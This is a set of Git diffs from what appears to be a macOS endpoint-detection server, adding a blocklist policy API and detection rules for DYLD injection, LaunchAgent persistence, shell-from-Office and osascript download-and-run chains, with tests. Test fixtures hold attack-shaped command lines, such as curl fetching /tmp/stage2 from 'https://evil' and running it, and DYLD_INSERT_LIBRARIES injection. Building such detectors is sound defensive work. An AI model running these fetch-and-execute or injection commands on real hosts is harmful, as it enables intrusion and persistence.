 		srv.URL+"/api/v1/admin/enrollments/AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA/revoke",
@@ -93,7 +95,7 @@ func TestRevoke_NotFound(t *testing.T) {
 }
 
 func TestRevoke_MissingBody(t *testing.T) {
-	srv, es := newAdminServer(t)
+	srv, es, _ := newAdminServer(t)
 	_, err := es.Register(t.Context(), enrollment.RegisterRequest{
 		HostID: testUUID, Hostname: "h", AgentVersion: "v", OSVersion: "o", SourceIP: "127.0.0.1",
 	})
@@ -110,8 +112,95 @@ func TestRevoke_MissingBody(t *testing.T) {
 	assert.Equal(t, http.StatusBadRequest, resp.StatusCode)
 }
 
+func TestGetPolicy_SeedRow(t *testing.T) {
+	srv, _, _ := newAdminServer(t)
+	req, err := http.NewRequestWithContext(t.Context(), http.MethodGet, srv.URL+"/api/v1/admin/policy", nil)
+	require.NoError(t, err)
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+
+	require.Equal(t, http.StatusOK, resp.StatusCode)
+	var got map[string]any
+	require.NoError(t, json.NewDecoder(resp.Body).Decode(&got))
+	assert.Equal(t, "default", got["name"])
+	assert.EqualValues(t, 1, got["version"])
+}
+
+func TestPutPolicy_HappyPath(t *testing.T) {
+	srv, es, s := newAdminServer(t)
+
+	// Enroll two hosts so there's something to fan out to.
+	for _, hostID := range []string{testUUID, "12345678-1234-1234-1234-123456789012"} {
+		_, err := es.Register(t.Context(), enrollment.RegisterRequest{
+			HostID: hostID, Hostname: "h", AgentVersion: "v", OSVersion: "o", SourceIP: "127.0.0.1",
+		})
+		require.NoError(t, err)
+	}
+
+	body, _ := json.Marshal(map[string]any{
+		"paths":  []string{"/tmp/qa-block", "/opt/evil"},
+		"hashes": []string{"deadbeef"},
+		"actor":  "qa-tester",
+		"reason": "phase-2 smoke",
+	})
+	req, err := http.NewRequestWithContext(t.Context(), http.MethodPut, srv.URL+"/api/v1/admin/policy", bytes.NewReader(body))
+	require.NoError(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+
+	require.Equal(t, http.StatusOK, resp.StatusCode)
+	var got map[string]any
+	require.NoError(t, json.NewDecoder(resp.Body).Decode(&got))
+	assert.EqualValues(t, 2, got["version"])
+
+	// Every active host now has exactly one pending set_blocklist command — the one this
+	// PUT fanned out. (Register was called directly, bypassing the enrollment Handler that
+	// would have queued its own initial command; the first-enroll path is covered in
+	// TestHandler_EnrollQueuesInitialPolicy in server/enrollment.)
+	for _, hostID := range []string{testUUID, "12345678-1234-1234-1234-123456789012"} {
+		cmds, err := s.ListCommands(t.Context(), hostID, "pending")
+		require.NoError(t, err)
+		var setBlocklist int
+		for _, c := range cmds {
+			if c.CommandType == "set_blocklist" {
+				setBlocklist++
+			}
+		}
+		assert.Equal(t, 1, setBlocklist, "host %s should have one set_blocklist from the PUT fan-out", hostID)
+	}
+}
+
+func TestPutPolicy_MissingActor(t *testing.T) {
+	srv, _, _ := newAdminServer(t)
+	body, _ := json.Marshal(map[string]any{"paths": []string{"/tmp/x"}})
+	req, err := http.NewRequestWithContext(t.Context(), http.MethodPut, srv.URL+"/api/v1/admin/policy", bytes.NewReader(body))
+	require.NoError(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+	assert.Equal(t, http.StatusBadRequest, resp.StatusCode)
+}
+
+func TestPutPolicy_EmptyBlocklistAccepted(t *testing.T) {
+	// "Clear everything" must be a first-class operation — no paths + no hashes is a valid
+	// edit so operators have a fast panic-button.
+	srv, _, _ := newAdminServer(t)
+	body, _ := json.Marshal(map[string]any{"actor": "qa-tester", "reason": "clear"})
+	req, err := http.NewRequestWithContext(t.Context(), http.MethodPut, srv.URL+"/api/v1/admin/policy", bytes.NewReader(body))
+	require.NoError(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+	assert.Equal(t, http.StatusOK, resp.StatusCode)
+}
+
 func TestRevoke_IdempotentPreservesFirstActor(t *testing.T) {
-	srv, es := newAdminServer(t)
+	srv, es, _ := newAdminServer(t)
 	_, err := es.Register(t.Context(), enrollment.RegisterRequest{
 		HostID: testUUID, Hostname: "h", AgentVersion: "v", OSVersion: "o", SourceIP: "127.0.0.1",
 	})

--- a/server/cmd/fleet-edr-server/main.go
+++ b/server/cmd/fleet-edr-server/main.go
@@ -33,6 +33,7 @@ import (
 	"github.com/fleetdm/edr/server/ingest"
 	"github.com/fleetdm/edr/server/logging"
 	"github.com/fleetdm/edr/server/observability"
+	"github.com/fleetdm/edr/server/policy"
 	"github.com/fleetdm/edr/server/processor"
 	"github.com/fleetdm/edr/server/store"
 	"github.com/fleetdm/edr/server/ui"
@@ -114,18 +115,25 @@ func run() error {
 	builder := graph.NewBuilder(s, logger)
 	det := detection.NewEngine(s, logger)
 	det.Register(&rules.SuspiciousExec{})
+	det.Register(&rules.PersistenceLaunchAgent{AllowedPlists: cfg.LaunchAgentAllowlist})
+	det.Register(&rules.DyldInsert{})
+	det.Register(&rules.ShellFromOffice{})
+	det.Register(&rules.OsascriptNetworkExec{})
 	proc := processor.New(s, builder, det, logger, cfg.ProcessInterval, cfg.ProcessBatch)
 
 	q := graph.NewQuery(s)
 	apiHandler := api.New(q, s, logger)
 
 	enrollStore := enrollment.NewStore(s.DB())
+	policyStore := policy.New(s.DB())
 	enrollHandler := enrollment.NewHandler(enrollStore, enrollment.Options{
 		EnrollSecret:  cfg.EnrollSecret,
 		RatePerMinute: cfg.EnrollRatePerMin,
 		Logger:        logger,
+		PolicyStore:   policyStore,
+		CommandStore:  s,
 	})
-	adminHandler := admin.New(enrollStore, logger)
+	adminHandler := admin.New(enrollStore, policyStore, s, logger)
 
 	// Build the mux as a composition of three authorization domains:
 	//   - public:  /livez, /readyz, /health, POST /api/v1/enroll
@@ -171,6 +179,7 @@ func run() error {
 		"GET /api/v1/alerts", "GET /api/v1/alerts/{id}", "PUT /api/v1/alerts/{id}",
 		"GET /api/v1/commands/{id}", "POST /api/v1/commands",
 		"GET /api/v1/admin/enrollments", "POST /api/v1/admin/enrollments/{host_id}/revoke",
+		"GET /api/v1/admin/policy", "PUT /api/v1/admin/policy",
 	} {
 		mux.Handle(p, adminProtected)
 	}

--- a/server/config/config.go
+++ b/server/config/config.go
@@ -28,6 +28,11 @@ type Config struct {
 	LogFormat         string
 	ProcessInterval   time.Duration
 	ProcessBatch      int
+
+	// LaunchAgentAllowlist is the set of plist paths the `persistence_launchagent` rule
+	// should silently accept. Populated from EDR_LAUNCHAGENT_ALLOWLIST (comma-separated
+	// absolute paths). Empty by default — every plist load fires.
+	LaunchAgentAllowlist map[string]struct{}
 }
 
 // TLSEnabled reports whether TLS cert and key are both set.
@@ -89,6 +94,17 @@ func loadFrom(getenv func(string) string) (*Config, error) {
 			errs = append(errs, fmt.Errorf("EDR_ENROLL_RATE_PER_MIN=%d must be positive", n))
 		default:
 			c.EnrollRatePerMin = n
+		}
+	}
+
+	if v := getenv("EDR_LAUNCHAGENT_ALLOWLIST"); v != "" {
+		c.LaunchAgentAllowlist = make(map[string]struct{})
+		for p := range strings.SplitSeq(v, ",") {
+			p = strings.TrimSpace(p)
+			if p == "" {
+				continue
+			}
+			c.LaunchAgentAllowlist[p] = struct{}{}
 		}
 	}
 

--- a/server/detection/rules/all_rules_integration_test.go
+++ b/server/detection/rules/all_rules_integration_test.go
@@ -1,0 +1,122 @@
+package rules
+
+import (
+	"encoding/json"
+	"log/slog"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/detection"
+	"github.com/fleetdm/edr/server/store"
+)
+
+// TestAllRulesWireUpAndFire proves the Phase 2 "detection pack" works as a single engine:
+// register every production rule, feed a single event batch that exercises each rule
+// exactly once, and assert we get a finding per rule with the expected severity. This is
+// the one test that catches regressions where a rule dev silently stops registering, or
+// where a shared helper gets a breaking edit that only shows up when the rules are run
+// together.
+func TestAllRulesWireUpAndFire(t *testing.T) {
+	s := store.OpenTestStore(t)
+	ctx := t.Context()
+
+	hostA := "11111111-1111-1111-1111-111111111111"
+	hostB := "22222222-2222-2222-2222-222222222222"
+
+	// Event batch covering every rule's positive case:
+	//   - suspicious_exec: python -> /bin/sh -> /tmp/payload (host A)
+	//   - persistence_launchagent: bash -> /bin/launchctl load ~/Library/LaunchAgents (host A)
+	//   - dyld_insert: ls with DYLD_INSERT_LIBRARIES= prefix (host A)
+	//   - shell_from_office: Microsoft Word -> /bin/bash (host B)
+	//   - osascript_network_exec: osascript -> curl + /tmp/stage2 (host A)
+	events := []store.Event{
+		// Chain 1: suspicious_exec (python → sh → /tmp/payload)
+		{EventID: "fork-py", HostID: hostA, TimestampNs: 1000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":50,"parent_pid":1}`)},
+		{EventID: "exec-py", HostID: hostA, TimestampNs: 1100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":50,"ppid":1,"path":"/usr/bin/python3","args":["py","-c","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-sh", HostID: hostA, TimestampNs: 2000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":100,"parent_pid":50}`)},
+		{EventID: "exec-sh", HostID: hostA, TimestampNs: 2100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":100,"ppid":50,"path":"/bin/sh","args":["sh","-c","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-pld", HostID: hostA, TimestampNs: 3000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":200,"parent_pid":100}`)},
+		{EventID: "exec-pld", HostID: hostA, TimestampNs: 3100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":200,"ppid":100,"path":"/tmp/payload","args":["/tmp/payload"],"uid":501,"gid":20}`)},
+
+		// Chain 2: persistence_launchagent
+		{EventID: "fork-bashpla", HostID: hostA, TimestampNs: 4000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":300,"parent_pid":1}`)},
+		{EventID: "exec-bashpla", HostID: hostA, TimestampNs: 4100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":300,"ppid":1,"path":"/bin/bash","args":["bash"],"uid":501,"gid":20}`)},
+		{EventID: "fork-lctl", HostID: hostA, TimestampNs: 5000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":400,"parent_pid":300}`)},
+		{EventID: "exec-lctl", HostID: hostA, TimestampNs: 5100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":400,"ppid":300,"path":"/bin/launchctl","args":["launchctl","load","/Users/alice/Library/LaunchAgents/com.evil.plist"],"uid":501,"gid":20}`)},
+
+		// Chain 3: dyld_insert — standalone ls with DYLD_* env prefix
+		{EventID: "fork-dyld", HostID: hostA, TimestampNs: 6000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":500,"parent_pid":1}`)},
+		{EventID: "exec-dyld", HostID: hostA, TimestampNs: 6100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":500,"ppid":1,"path":"/bin/ls","args":["DYLD_INSERT_LIBRARIES=/tmp/x.dylib","/bin/ls"],"uid":501,"gid":20}`)},
+
+		// Chain 4: osascript_network_exec (osa → curl + /tmp/stage2)
+		{EventID: "fork-osa", HostID: hostA, TimestampNs: 7000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":600,"parent_pid":1}`)},
+		{EventID: "exec-osa", HostID: hostA, TimestampNs: 7100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":600,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","-e","..."],"uid":501,"gid":20}`)},
+		{EventID: "fork-osa-curl", HostID: hostA, TimestampNs: 7500, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":700,"parent_pid":600}`)},
+		{EventID: "exec-osa-curl", HostID: hostA, TimestampNs: 7600, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":700,"ppid":600,"path":"/usr/bin/curl","args":["curl","-o","/tmp/stage2","https://evil"],"uid":501,"gid":20}`)},
+		{EventID: "fork-osa-s2", HostID: hostA, TimestampNs: 8000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":800,"parent_pid":600}`)},
+		{EventID: "exec-osa-s2", HostID: hostA, TimestampNs: 8100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":800,"ppid":600,"path":"/tmp/stage2","args":["/tmp/stage2"],"uid":501,"gid":20}`)},
+
+		// Chain 5: shell_from_office (Microsoft Word → /bin/bash) on host B
+		{EventID: "fork-word", HostID: hostB, TimestampNs: 9000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":900,"parent_pid":1}`)},
+		{EventID: "exec-word", HostID: hostB, TimestampNs: 9100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":900,"ppid":1,"path":"/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word","args":["Word"],"uid":501,"gid":20}`)},
+		{EventID: "fork-wordbash", HostID: hostB, TimestampNs: 10000, EventType: "fork",
+			Payload: json.RawMessage(`{"child_pid":1000,"parent_pid":900}`)},
+		{EventID: "exec-wordbash", HostID: hostB, TimestampNs: 10100, EventType: "exec",
+			Payload: json.RawMessage(`{"pid":1000,"ppid":900,"path":"/bin/bash","args":["bash"],"uid":501,"gid":20}`)},
+	}
+	require.NoError(t, s.InsertEvents(ctx, events))
+	materialize(t, s, events)
+
+	engine := detection.NewEngine(s, slog.Default())
+	engine.Register(&SuspiciousExec{})
+	engine.Register(&PersistenceLaunchAgent{})
+	engine.Register(&DyldInsert{})
+	engine.Register(&ShellFromOffice{})
+	engine.Register(&OsascriptNetworkExec{})
+	require.NoError(t, engine.Evaluate(ctx, events))
+
+	// Each rule should have produced at least one alert. We query by rule_id rather than
+	// by count because some rules (suspicious_exec) can legitimately fire on multiple
+	// chains if our fixtures overlap — we only care that no rule was silently skipped.
+	wantRules := map[string]string{
+		"suspicious_exec":         "high",
+		"persistence_launchagent": "high",
+		"dyld_insert":             "high",
+		"shell_from_office":       "high",
+		"osascript_network_exec":  "critical",
+	}
+
+	alerts, err := s.ListAlerts(ctx, store.AlertFilter{})
+	require.NoError(t, err)
+	gotBy := map[string]string{}
+	for _, a := range alerts {
+		gotBy[a.RuleID] = a.Severity
+	}
+	for rule, severity := range wantRules {
+		assert.Equal(t, severity, gotBy[rule], "rule %q missing or wrong severity", rule)
+	}
+	assert.GreaterOrEqual(t, len(alerts), len(wantRules),
+		"every registered rule should have fired at least once")
+}

--- a/server/detection/rules/dyld_insert.go
+++ b/server/detection/rules/dyld_insert.go
@@ -1,0 +1,91 @@
+package rules
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+
+	"github.com/fleetdm/edr/server/detection"
+	"github.com/fleetdm/edr/server/store"
+)
+
+// DyldInsert fires when a process is launched with DYLD_INSERT_LIBRARIES or
+// DYLD_LIBRARY_PATH in its environment. Those env vars tell dyld to load arbitrary
+// dylibs, a classic macOS code-injection technique.
+//
+// Phase 2 MVP: the ESF extension does not (yet) capture the full env map, so this rule
+// only catches the "explicit prefix" cases — either the env vars appear in argv (shell
+// style `VAR=x /bin/true`) or the caller invoked `env VAR=x target`. Inherited env vars
+// are invisible to us until the extension learns to serialise them; that extension change
+// is tracked in Phase 4 (Data lifecycle + observability).
+//
+// MITRE ATT&CK: T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)
+type DyldInsert struct{}
+
+func (r *DyldInsert) ID() string { return "dyld_insert" }
+
+// Dangerous env prefixes. DYLD_FRAMEWORK_PATH + DYLD_FALLBACK_* also exist but are
+// higher-false-positive (SIP disables them for Apple binaries anyway); we leave them
+// out for MVP and revisit if pilot customers surface real evasion.
+var dyldPrefixes = []string{
+	"DYLD_INSERT_LIBRARIES=",
+	"DYLD_LIBRARY_PATH=",
+}
+
+type dyldPayload struct {
+	PID  int      `json:"pid"`
+	Path string   `json:"path"`
+	Args []string `json:"args"`
+}
+
+func (r *DyldInsert) Evaluate(ctx context.Context, events []store.Event, s *store.Store) ([]detection.Finding, error) {
+	var findings []detection.Finding
+	for _, evt := range events {
+		if evt.EventType != "exec" {
+			continue
+		}
+		var p dyldPayload
+		if err := json.Unmarshal(evt.Payload, &p); err != nil {
+			continue
+		}
+		matched := matchDyldArg(p.Args)
+		if matched == "" {
+			continue
+		}
+
+		proc, err := s.GetProcessByPID(ctx, evt.HostID, p.PID, evt.TimestampNs)
+		if err != nil {
+			return nil, fmt.Errorf("get process pid %d: %w", p.PID, err)
+		}
+		if proc == nil {
+			continue
+		}
+
+		findings = append(findings, detection.Finding{
+			HostID:      evt.HostID,
+			RuleID:      r.ID(),
+			Severity:    detection.SeverityHigh,
+			Title:       "DYLD injection env var set on exec",
+			Description: fmt.Sprintf("%s launched with %s", p.Path, matched),
+			ProcessID:   proc.ID,
+			EventIDs:    []string{evt.EventID},
+		})
+	}
+	return findings, nil
+}
+
+// matchDyldArg returns the first argv entry that starts with a dangerous DYLD env prefix,
+// or "" if none. We strip the value side so logs / alerts don't accidentally echo a
+// potentially-sensitive dylib path; the full path is still in the raw event payload for
+// responders who need it.
+func matchDyldArg(args []string) string {
+	for _, a := range args {
+		for _, prefix := range dyldPrefixes {
+			if strings.HasPrefix(a, prefix) {
+				return prefix + "<redacted>"
+			}
+		}
+	}
+	return ""
+}

--- a/server/detection/rules/dyld_insert.go
+++ b/server/detection/rules/dyld_insert.go
@@ -49,7 +49,7 @@ func (r *DyldInsert) Evaluate(ctx context.Context, events []store.Event, s *stor
 		if err := json.Unmarshal(evt.Payload, &p); err != nil {
 			continue
 		}
-		matched := matchDyldArg(p.Args)
+		matched := matchDyldArg(p.Path, p.Args)
 		if matched == "" {
 			continue
 		}
@@ -75,12 +75,32 @@ func (r *DyldInsert) Evaluate(ctx context.Context, events []store.Event, s *stor
 	return findings, nil
 }
 
-// matchDyldArg returns the first argv entry that starts with a dangerous DYLD env prefix,
-// or "" if none. We strip the value side so logs / alerts don't accidentally echo a
-// potentially-sensitive dylib path; the full path is still in the raw event payload for
-// responders who need it.
-func matchDyldArg(args []string) string {
-	for _, a := range args {
+// matchDyldArg returns the matching DYLD env prefix when the exec is launching with one
+// of the dangerous env vars in a leading assignment position, or "" otherwise. We strip
+// the value side so logs / alerts don't accidentally echo a potentially-sensitive dylib
+// path; the full argv is still in the raw event payload for responders who need it.
+//
+// Why leading-only: `echo DYLD_INSERT_LIBRARIES=/tmp/x` or `curl --data
+// DYLD_INSERT_LIBRARIES=...` would false-positive if we scanned every argv slot. The
+// dangerous shape is the shell-style "VAR=value /path/to/binary" prefix (argv[0] onwards)
+// or the `env VAR=value binary` invocation. We capture both without firing on arbitrary
+// data that happens to contain the substring.
+func matchDyldArg(path string, args []string) string {
+	// The canonical env invocations are "env", "/usr/bin/env", and shim paths ending in
+	// "/env". For anything else, only argv[0] is a legitimate VAR=VALUE slot (the shell's
+	// `VAR=value cmd` form).
+	isEnv := path == "/usr/bin/env" || strings.HasSuffix(path, "/env")
+
+	for i, a := range args {
+		// Stop once we've walked past the leading env-assignment window. For `env`-style
+		// invocations that's every leading KEY=VALUE until the first non-assignment arg;
+		// for everything else it's argv[0] only.
+		if !isEnv && i > 0 {
+			break
+		}
+		if isEnv && i > 0 && !strings.Contains(a, "=") {
+			break
+		}
 		for _, prefix := range dyldPrefixes {
 			if strings.HasPrefix(a, prefix) {
 				return prefix + "<redacted>"

--- a/server/detection/rules/dyld_insert_test.go
+++ b/server/detection/rules/dyld_insert_test.go
@@ -20,13 +20,13 @@ func TestDyldInsert_TableDriven(t *testing.T) {
 
 	cases := []fixture{
 		{
-			name:        "DYLD_INSERT_LIBRARIES prefix in args fires",
+			name:        "DYLD_INSERT_LIBRARIES leading shell-style prefix fires",
 			path:        "/bin/ls",
 			args:        []string{"DYLD_INSERT_LIBRARIES=/tmp/inject.dylib", "/bin/ls", "-la"},
 			wantFinding: true,
 		},
 		{
-			name:        "DYLD_LIBRARY_PATH prefix in args fires",
+			name:        "DYLD_LIBRARY_PATH through env command fires",
 			path:        "/usr/bin/env",
 			args:        []string{"/usr/bin/env", "DYLD_LIBRARY_PATH=/tmp", "/bin/ls"},
 			wantFinding: true,
@@ -47,6 +47,21 @@ func TestDyldInsert_TableDriven(t *testing.T) {
 			name:        "similar but-not-matching arg does NOT fire",
 			path:        "/bin/ls",
 			args:        []string{"MY_DYLD_INSERT_LIBRARIES=/tmp/inject.dylib", "/bin/ls"},
+			wantFinding: false,
+		},
+		{
+			// Regression: CodeRabbit flagged scanning every argv element as a false-positive
+			// vector. echo / printf are the canonical "data through argv" shapes — the rule
+			// must not fire just because a process prints the variable name.
+			name:        "DYLD_INSERT_LIBRARIES as echo DATA does NOT fire",
+			path:        "/bin/echo",
+			args:        []string{"/bin/echo", "DYLD_INSERT_LIBRARIES=/tmp/inject.dylib"},
+			wantFinding: false,
+		},
+		{
+			name:        "DYLD_INSERT_LIBRARIES in curl --data does NOT fire",
+			path:        "/usr/bin/curl",
+			args:        []string{"/usr/bin/curl", "-X", "POST", "--data", "DYLD_INSERT_LIBRARIES=/tmp/x", "https://evil"},
 			wantFinding: false,
 		},
 	}

--- a/server/detection/rules/dyld_insert_test.go
+++ b/server/detection/rules/dyld_insert_test.go
@@ -1,0 +1,88 @@
+package rules
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/store"
+)
+
+func TestDyldInsert_TableDriven(t *testing.T) {
+	type fixture struct {
+		name        string
+		path        string
+		args        []string
+		wantFinding bool
+	}
+
+	cases := []fixture{
+		{
+			name:        "DYLD_INSERT_LIBRARIES prefix in args fires",
+			path:        "/bin/ls",
+			args:        []string{"DYLD_INSERT_LIBRARIES=/tmp/inject.dylib", "/bin/ls", "-la"},
+			wantFinding: true,
+		},
+		{
+			name:        "DYLD_LIBRARY_PATH prefix in args fires",
+			path:        "/usr/bin/env",
+			args:        []string{"/usr/bin/env", "DYLD_LIBRARY_PATH=/tmp", "/bin/ls"},
+			wantFinding: true,
+		},
+		{
+			name:        "plain ls without env does NOT fire",
+			path:        "/bin/ls",
+			args:        []string{"/bin/ls", "-la"},
+			wantFinding: false,
+		},
+		{
+			name:        "DYLD_FALLBACK_LIBRARY_PATH does NOT fire — not on MVP list",
+			path:        "/bin/ls",
+			args:        []string{"DYLD_FALLBACK_LIBRARY_PATH=/tmp", "/bin/ls"},
+			wantFinding: false,
+		},
+		{
+			name:        "similar but-not-matching arg does NOT fire",
+			path:        "/bin/ls",
+			args:        []string{"MY_DYLD_INSERT_LIBRARIES=/tmp/inject.dylib", "/bin/ls"},
+			wantFinding: false,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			s := store.OpenTestStore(t)
+			ctx := t.Context()
+
+			payload, _ := json.Marshal(map[string]any{
+				"pid": 100, "ppid": 50, "path": tc.path, "args": tc.args,
+				"uid": 501, "gid": 20,
+			})
+			events := []store.Event{
+				{EventID: "fork", HostID: "host-a", TimestampNs: 1000, EventType: "fork",
+					Payload: json.RawMessage(`{"child_pid":100,"parent_pid":1}`)},
+				{EventID: "exec", HostID: "host-a", TimestampNs: 1100, EventType: "exec", Payload: payload},
+			}
+			require.NoError(t, s.InsertEvents(ctx, events))
+			materialize(t, s, events)
+
+			rule := &DyldInsert{}
+			findings, err := rule.Evaluate(ctx, events, s)
+			require.NoError(t, err)
+
+			if !tc.wantFinding {
+				assert.Empty(t, findings)
+				return
+			}
+			require.Len(t, findings, 1)
+			assert.Equal(t, "dyld_insert", findings[0].RuleID)
+			assert.Equal(t, "high", findings[0].Severity)
+			assert.Contains(t, findings[0].Description, "<redacted>",
+				"description must not echo the raw dylib path")
+			assert.NotContains(t, findings[0].Description, "/tmp/inject.dylib",
+				"description must not echo the raw dylib path")
+		})
+	}
+}

--- a/server/detection/rules/osascript_network_exec.go
+++ b/server/detection/rules/osascript_network_exec.go
@@ -56,25 +56,31 @@ func (r *OsascriptNetworkExec) Evaluate(ctx context.Context, events []store.Even
 		}
 
 		tr := store.TimeRange{FromNs: evt.TimestampNs, ToNs: evt.TimestampNs + windowNs}
-		children, err := s.GetChildProcesses(ctx, evt.HostID, p.PID, tr)
+		descendants, err := collectDescendants(ctx, s, evt.HostID, p.PID, tr)
 		if err != nil {
-			return nil, fmt.Errorf("get osascript children pid %d: %w", p.PID, err)
+			return nil, err
 		}
-		if len(children) == 0 {
+		if len(descendants) == 0 {
 			continue
 		}
 
-		// Chain detection: at least one download child AND at least one exec out of a
+		// Chain detection: at least one downloader AND at least one exec out of a
 		// suspicious path (same allowlist as suspicious_exec, via isSuspiciousPath).
+		// Walk the full descendant set because real droppers often route through an
+		// intermediate shell (`osascript → sh → curl → /tmp/stage2`) and a direct-
+		// children-only scan misses those.
 		var downloader *store.Process
 		var tempExec *store.Process
-		for i := range children {
-			c := &children[i]
-			if downloadBinaries[c.Path] {
+		for i := range descendants {
+			c := &descendants[i]
+			if downloader == nil && downloadBinaries[c.Path] {
 				downloader = c
 			}
-			if isSuspiciousPath(c.Path) {
+			if tempExec == nil && isSuspiciousPath(c.Path) {
 				tempExec = c
+			}
+			if downloader != nil && tempExec != nil {
+				break
 			}
 		}
 		if downloader == nil || tempExec == nil {
@@ -82,16 +88,10 @@ func (r *OsascriptNetworkExec) Evaluate(ctx context.Context, events []store.Even
 		}
 
 		// The finding links to the temp-path process — that's the thing responders need
-		// to investigate first. The download child + the osascript itself are both in the
-		// event_ids so the alert detail view can render the full chain.
-		osaProc, err := s.GetProcessByPID(ctx, evt.HostID, p.PID, evt.TimestampNs)
-		if err != nil {
-			return nil, fmt.Errorf("get osascript process pid %d: %w", p.PID, err)
-		}
-		if osaProc == nil {
-			continue
-		}
-
+		// to investigate first. EventIDs includes just the triggering osascript exec
+		// because that is the event this detector saw in the batch; child exec events
+		// are reachable from the linked ProcessID via the process tree query and the
+		// server-side alert detail view renders the full chain from there.
 		findings = append(findings, detection.Finding{
 			HostID:   evt.HostID,
 			RuleID:   r.ID(),
@@ -106,4 +106,39 @@ func (r *OsascriptNetworkExec) Evaluate(ctx context.Context, events []store.Even
 		})
 	}
 	return findings, nil
+}
+
+// collectDescendants runs a bounded breadth-first traversal rooted at rootPID, returning
+// every process whose ancestry within the given time range terminates at rootPID. The
+// traversal is capped by `maxDescendants` to keep pathological fork-bomb trees from
+// blowing up memory; real dropper chains land in single digits, so a 500-node cap is
+// generous without being abusable.
+const maxDescendants = 500
+
+func collectDescendants(ctx context.Context, s *store.Store, hostID string, rootPID int, tr store.TimeRange) ([]store.Process, error) {
+	var all []store.Process
+	queue := []int{rootPID}
+	seen := map[int]struct{}{rootPID: {}}
+
+	for len(queue) > 0 && len(all) < maxDescendants {
+		parent := queue[0]
+		queue = queue[1:]
+
+		children, err := s.GetChildProcesses(ctx, hostID, parent, tr)
+		if err != nil {
+			return nil, fmt.Errorf("get children of pid %d: %w", parent, err)
+		}
+		for _, c := range children {
+			if _, dupe := seen[c.PID]; dupe {
+				continue
+			}
+			seen[c.PID] = struct{}{}
+			all = append(all, c)
+			if len(all) >= maxDescendants {
+				break
+			}
+			queue = append(queue, c.PID)
+		}
+	}
+	return all, nil
 }

--- a/server/detection/rules/osascript_network_exec.go
+++ b/server/detection/rules/osascript_network_exec.go
@@ -1,0 +1,109 @@
+package rules
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+
+	"github.com/fleetdm/edr/server/detection"
+	"github.com/fleetdm/edr/server/store"
+)
+
+// OsascriptNetworkExec fires when `osascript` (or its alias `/usr/bin/osascript`) is the
+// root of a 30-second process tree that both downloads something (a `curl` or `wget`
+// child) AND launches a binary out of a temp directory. This matches the
+// "AppleScript → curl → stage 2 from /tmp" chain seen across macOS commodity droppers.
+//
+// We deliberately fire on the combination (download + temp-exec), not on each individually,
+// so the false-positive rate is manageable — osascript by itself is normal on managed
+// fleets, and /tmp exec alone is already covered by suspicious_exec.
+//
+// MITRE ATT&CK: T1059.002 (AppleScript) + T1105 (Ingress Tool Transfer)
+type OsascriptNetworkExec struct{}
+
+func (r *OsascriptNetworkExec) ID() string { return "osascript_network_exec" }
+
+var osascriptPaths = map[string]bool{
+	"/usr/bin/osascript": true,
+}
+
+var downloadBinaries = map[string]bool{
+	"/usr/bin/curl":          true,
+	"/usr/bin/wget":          true,
+	"/opt/homebrew/bin/curl": true,
+	"/opt/homebrew/bin/wget": true,
+}
+
+type osascriptPayload struct {
+	PID  int      `json:"pid"`
+	Path string   `json:"path"`
+	Args []string `json:"args"`
+}
+
+func (r *OsascriptNetworkExec) Evaluate(ctx context.Context, events []store.Event, s *store.Store) ([]detection.Finding, error) {
+	const windowNs = int64(30_000_000_000) // 30 seconds
+	var findings []detection.Finding
+	for _, evt := range events {
+		if evt.EventType != "exec" {
+			continue
+		}
+		var p osascriptPayload
+		if err := json.Unmarshal(evt.Payload, &p); err != nil {
+			continue
+		}
+		if !osascriptPaths[p.Path] {
+			continue
+		}
+
+		tr := store.TimeRange{FromNs: evt.TimestampNs, ToNs: evt.TimestampNs + windowNs}
+		children, err := s.GetChildProcesses(ctx, evt.HostID, p.PID, tr)
+		if err != nil {
+			return nil, fmt.Errorf("get osascript children pid %d: %w", p.PID, err)
+		}
+		if len(children) == 0 {
+			continue
+		}
+
+		// Chain detection: at least one download child AND at least one exec out of a
+		// suspicious path (same allowlist as suspicious_exec, via isSuspiciousPath).
+		var downloader *store.Process
+		var tempExec *store.Process
+		for i := range children {
+			c := &children[i]
